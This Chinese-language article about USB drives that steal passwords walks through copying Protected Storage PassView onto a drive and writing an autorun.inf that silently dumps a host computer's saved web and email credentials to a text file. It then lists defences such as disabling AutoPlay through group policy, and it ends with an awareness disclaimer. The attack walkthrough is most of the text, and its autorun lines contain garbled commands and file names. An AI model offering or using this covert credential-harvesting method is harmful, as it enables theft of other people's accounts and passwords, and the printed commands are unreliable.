防范Ｕ盤自動偷取密碼

你知道u盤除了可以儲存數(shù)據(jù)外，還可以改成偷取密碼的工具嗎?只要在電腦上一插入u盤，它就會偷取電腦里的密碼，包括瀏覽網(wǎng)頁時輸入的論壇、郵箱登錄密碼等，而這一切只需要一個軟件“Protected Storage PassView”就能做到。為了更好地防止u盤泄密，先來看看ProtectedStorage PassView是怎么偷到密碼的。

Protected Storage PassView的安裝文件夾中有兩個文件“pspv.exe”和“pspv_lng.ini”，把它們拷貝到u盤的根目錄下。然后運(yùn)行Pspv程序，此時會開啟程序主窗口，并把這臺電腦里的網(wǎng)頁登錄密碼和自動完成表單等列出來，另外也會列出郵箱的賬號密碼(如圖1)。這些是從Cookies里抓取的曾在網(wǎng)頁上輸入過的密碼。如果不需要列出自動完成表單，可以在主程序下取消“查看”菜單下的“自動完成表單”選項。

現(xiàn)在感覺到Protected Storage PassView的威力了吧?如果讓它自動運(yùn)行，那偷取密碼就會在無聲無息中進(jìn)行了。用記事本打開u盤上的“autorun.inf”文件，讓Pspv能在后臺運(yùn)行，并將偷取的密碼表單保存為TXT文件。打開記事本，輸入以下代碼:

[autorun]

Shenexecute=pspv.exe/stext\\pass txt

Shellexecute=pspv.exe/exp\\expl·txt

Shellexecute=pspv.exe/imp\\expl.txt

將文件保存到u盤根目錄下，并將文件命名為“autorun.inf”文件。

以后只要你在別的電腦上插入u盤，前提是該電腦不禁止自動播放功能，就會偷偷地將這臺電腦的個人密碼輸出成“pass.txt”文本文件，并存放在你的u盤里。打開“pass.txt”文件看看吧，賬號密碼全到手，包括這臺電腦曾進(jìn)入過哪個網(wǎng)頁論壇注冊或購物網(wǎng)站，使用什么登錄密碼等等，通通都一覽無遺了(如圖2)。

恐怖吧!這樣諸如淘寶網(wǎng)站支付寶之類的用戶名和密碼就無安全性可言了。應(yīng)對方法是確保電腦上安裝有殺毒軟件并開啟實(shí)時監(jiān)控功能。在Windows2000和WindowsXP中，有一項功能叫“自動播放”，當(dāng)插入光盤或者u盤時，系統(tǒng)自動讀取“Autorun.inf”文件，運(yùn)行其中的內(nèi)容，但只要禁用這個功能就可以防范這類程序的運(yùn)行。在插入u盤的同時可以按住Shift鍵不放，暫時關(guān)閉“自動播放”功能，但這不是長久之計.還可以通過組策略禁用“自動播放”功能。點(diǎn)擊“開始/運(yùn)行”，輸入“gpedit.msc”打開組策略窗口，依次展開到“計算機(jī)配置/管理模板/系統(tǒng)”，在右側(cè)窗口找到“關(guān)閉自動播放”項目，默認(rèn)狀態(tài)為“未被配置”，在其上雙擊，在“策略”中選中“啟用”選項，并在下方的“關(guān)閉自動播放”的下拉列表中選擇“所有驅(qū)動器”，點(diǎn)擊“確定”即可禁用“自動播放”功能。除了以上方法以外，還可以通過右鍵或者通過資源管理器來打開U盤，避開讀取“Autorun.inf”文件，切記不要通過雙擊方式打開u盤。

筆者書寫本文的目的不是在于教大家如何去盜取他人的密碼，而是引起大家的重視，做好U盤病毒的防范。再說本軟件也未必只會害人，比如使用它可以幫助我們找回忘記的密碼等。